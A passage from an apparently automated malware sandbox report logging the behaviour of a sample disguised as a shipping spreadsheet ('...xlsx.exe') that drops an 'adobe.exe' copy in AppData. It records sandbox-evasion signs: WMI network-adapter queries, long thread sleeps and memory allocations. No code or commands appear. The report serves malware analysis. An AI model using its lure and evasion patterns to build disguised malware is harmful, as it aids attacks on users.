                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory allocated: 4D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeMemory allocated: 4B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4A20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1940000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 3290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 8D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4570000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599563Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598857Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598750Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597844Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594874Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594438Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599881Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599763Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599652Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598561Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596560Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596123Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595577Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595260Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597266Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWindow / User API: threadDelayed 2376Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWindow / User API: threadDelayed 7457Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 3382Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 6467Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 1692Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 8151Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 6940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe TID: 5676Thread sleep count: 34 > 30Jump to behavior
